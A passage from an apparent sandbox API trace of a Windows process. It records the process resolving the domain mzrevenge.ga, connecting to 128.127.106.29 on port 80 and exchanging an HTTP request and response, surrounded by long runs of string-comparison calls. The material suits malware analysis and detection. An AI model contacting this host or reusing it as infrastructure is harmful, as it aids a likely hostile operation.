lpString1="0", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0101.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="//", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0101.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0101.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0101.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0101.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0101.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0101.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0101.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0101.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PATCH", cchCount2=5) returned 1 [0101.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0101.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0101.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0101.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0101.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PATCH", cchCount2=5) returned 1 [0101.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0101.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="mzrevenge.ga", cchCount2=12) returned 1 [0101.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0101.878] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0101.878] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x2483c3c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="socket", lpUsedDefaultChar=0x0) returned 6 [0101.878] GetProcAddress (hModule=0x754f0000, lpProcName="socket") returned 0x75504510 [0101.878] socket (af=2, type=1, protocol=0) returned 0x3d0 [0101.939] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockopt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.939] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockopt", cchWideChar=10, lpMultiByteStr=0x247aa6c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getsockopt", lpUsedDefaultChar=0x0) returned 10 [0101.939] GetProcAddress (hModule=0x754f0000, lpProcName="getsockopt") returned 0x75503b30 [0101.939] getsockopt (in: s=0x3d0, level=65535, optname=4104, optval=0x19fb10, optlen=0x19fb0c | out: optval="\x01", optlen=0x19fb0c) returned 0 [0101.941] getsockopt (in: s=0x3d0, level=6, optname=1, optval=0x19fb10, optlen=0x19fb0c | out: optval="", optlen=0x19fb0c) returned 0 [0101.942] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.942] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x247aa6c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setsockopt", lpUsedDefaultChar=0x0) returned 10 [0101.942] GetProcAddress (hModule=0x754f0000, lpProcName="setsockopt") returned 0x754ffd70 [0101.942] setsockopt (s=0x3d0, level=65535, optname=4, optval="", optlen=4) returned 0 [0101.942] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.942] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x2483c3c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="htons", lpUsedDefaultChar=0x0) returned 5 [0101.942] GetProcAddress (hModule=0x754f0000, lpProcName="htons") returned 0x75508ff0 [0101.942] htons (hostshort=0x0) returned 0x0 [0101.942] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="bind", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0101.942] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="bind", cchWideChar=4, lpMultiByteStr=0x2483c3c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bind", lpUsedDefaultChar=0x0) returned 4 [0101.942] GetProcAddress (hModule=0x754f0000, lpProcName="bind") returned 0x75501cc0 [0101.942] bind (s=0x3d0, addr=0x19fa68*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0101.943] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.943] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x247aa6c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getsockname", lpUsedDefaultChar=0x0) returned 11 [0101.943] GetProcAddress (hModule=0x754f0000, lpProcName="getsockname") returned 0x75503750 [0101.943] getsockname (in: s=0x3d0, name=0x19fa5c, namelen=0x19fadc | out: name=0x19fa5c*(sa_family=2, sin_port=0xc218, sin_addr="0.0.0.0"), namelen=0x19fadc) returned 0 [0101.943] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.943] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x2483c3c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntohs", lpUsedDefaultChar=0x0) returned 5 [0101.943] GetProcAddress (hModule=0x754f0000, lpProcName="ntohs") returned 0x75508ff0 [0101.943] htons (hostshort=0x18c2) returned 0xc218 [0101.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mzrevenge.ga", cchCount1=12, lpString2="LOCALHOST", cchCount2=9) returned 3 [0101.943] GetAddrInfoW (in: pNodeName="mzrevenge.ga", pServiceName=0x0, pHints=0x19fb10*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fb30 | out: ppResult=0x19fb30*=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c0f8*(sa_family=2, sin_port=0x0, sin_addr="128.127.106.29"), ai_next=0x0)) returned 0 [0102.147] FreeAddrInfoW (pAddrInfo=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c0f8*(sa_family=2, sin_port=0x0, sin_addr="128.127.106.29"), ai_next=0x0)) [0102.147] htons (hostshort=0x50) returned 0x5000 [0102.147] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0102.147] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x2483c3c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="connect", lpUsedDefaultChar=0x0) returned 7 [0102.148] GetProcAddress (hModule=0x754f0000, lpProcName="connect") returned 0x754f5410 [0102.148] connect (s=0x3d0, name=0x19fac0*(sa_family=2, sin_port=0x50, sin_addr="128.127.106.29"), namelen=16) returned 0 [0102.180] getsockname (in: s=0x3d0, name=0x19faa8, namelen=0x19fb28 | out: name=0x19faa8*(sa_family=2, sin_port=0xc218, sin_addr="192.168.0.147"), namelen=0x19fb28) returned 0 [0102.180] htons (hostshort=0x18c2) returned 0xc218 [0102.180] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.180] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x247aa6c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getpeername", lpUsedDefaultChar=0x0) returned 11 [0102.180] GetProcAddress (hModule=0x754f0000, lpProcName="getpeername") returned 0x755043d0 [0102.180] getpeername (in: s=0x3d0, name=0x19faa8, namelen=0x19fb28 | out: name=0x19faa8*(sa_family=2, sin_port=0x50, sin_addr="128.127.106.29"), namelen=0x19fb28) returned 0 [0102.180] htons (hostshort=0x5000) returned 0x50 [0102.180] GetCurrentThreadId () returned 0x1358 [0102.181] GetCurrentThreadId () returned 0x1358 [0102.181] GetCurrentThreadId () returned 0x1358 [0102.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="Accept", cchCount2=6) returned 3 [0102.181] GetCurrentThreadId () returned 0x1358 [0102.181] GetCurrentThreadId () returned 0x1358 [0102.181] GetCurrentThreadId () returned 0x1358 [0102.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="User-Agent", cchCount2=10) returned 1 [0102.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept", cchCount1=6, lpString2="User-Agent", cchCount2=10) returned 1 [0102.181] GetCurrentThreadId () returned 0x1358 [0102.181] GetCurrentThreadId () returned 0x1358 [0102.181] GetCurrentThreadId () returned 0x1358 [0102.181] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0102.181] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x2483c3c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="send", lpUsedDefaultChar=0x0) returned 4 [0102.182] GetProcAddress (hModule=0x754f0000, lpProcName="send") returned 0x754f5030 [0102.182] send (s=0x3d0, buf=0x2431408*, len=268, flags=0) returned 268 [0102.182] GetModuleHandleW (lpModuleName="KERNEL32") returned 0x772d0000 [0102.182] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTickCount64", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.182] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTickCount64", cchWideChar=14, lpMultiByteStr=0x247aa6c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetTickCount64", lpUsedDefaultChar=0x0) returned 14 [0102.182] GetProcAddress (hModule=0x772d0000, lpProcName="GetTickCount64") returned 0x772e0db0 [0102.182] GetTickCount64 () returned 0x115ad92 [0102.182] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0102.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x2483c3c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="select", lpUsedDefaultChar=0x0) returned 6 [0102.183] GetProcAddress (hModule=0x754f0000, lpProcName="select") returned 0x754f4ea0 [0102.183] select (in: nfds=0, readfds=0x19fa24, writefds=0x0, exceptfds=0x0, timeout=0x0 | out: readfds=0x19fa24, writefds=0x0, exceptfds=0x0) returned 1 [0102.231] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0102.231] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x2483c3c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recv", lpUsedDefaultChar=0x0) returned 4 [0102.232] GetProcAddress (hModule=0x754f0000, lpProcName="recv") returned 0x75500c50 [0102.232] recv (in: s=0x3d0, buf=0x24048b8, len=32768, flags=0 | out: buf=0x24048b8*) returned 315 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.0", cchCount1=3, lpString2="1.1", cchCount2=3) returned 1 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.1", cchCount1=3, lpString2="1.1", cchCount2=3) returned 2 [0102.232] GetTickCount64 () returned 0x115adc1 [0102.232] GetTickCount64 () returned 0x115adc1 [0102.232] GetTickCount64 () returned 0x115adc1 [0102.232] GetTickCount64 () returned 0x115adc1 [0102.232] GetTickCount64 () returned 0x115adc1 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Cache-control", cchCount2=13) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Cache-control", cchCount2=13) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Cache-control", cchCount2=13) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Connection", cchCount2=10) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Connection", cchCount2=10) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Connection", cchCount2=10) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Connection", cchCount2=10) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Version", cchCount2=15) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Version", cchCount2=15) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Version", cchCount2=15) returned 1 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Language", cchCount2=16) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Language", cchCount2=16) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Language", cchCount2=16) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Type", cchCount2=12) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Type", cchCount2=12) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Type", cchCount2=12) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Type", cchCount2=12) returned 2 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTF-8", cchCount1=1, lpString2="\"", cchCount2=1) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="charset=UTF-8", cchCount1=7, lpString2="charset", cchCount2=7) returned 2 [0102.233] GetCurrentThreadId () returned 0x1358 [0102.233] GetCurrentThreadId () returned 0x1358 [0102.233] GetCurrentThreadId () returned 0x1358 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Length", cchCount2=14) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Length", cchCount2=14) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Length", cchCount2=14) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Range", cchCount2=13) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Range", cchCount2=13) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Range", cchCount2=13) returned 3 [0102.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Date", cchCount2=4) returned 2 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="SUN", cchCount2=3) returned 1 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="MON", cchCount2=3) returned 2 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JAN", cchCount2=3) returned 1 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FEB", cchCount2=3) returned 1 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAR", cchCount2=3) returned 1 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="APR", cchCount2=3) returned 1 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAY", cchCount2=3) returned 1 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUN", cchCount2=3) returned 1 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUL", cchCount2=3) returned 1 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AUG", cchCount2=3) returned 1 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEP", cchCount2=3) returned 1 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OCT", cchCount2=3) returned 1 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NOV", cchCount2=3) returned 1 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEC", cchCount2=3) returned 1 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUNE", cchCount2=4) returned 1 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JULY", cchCount2=4) returned 1 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) 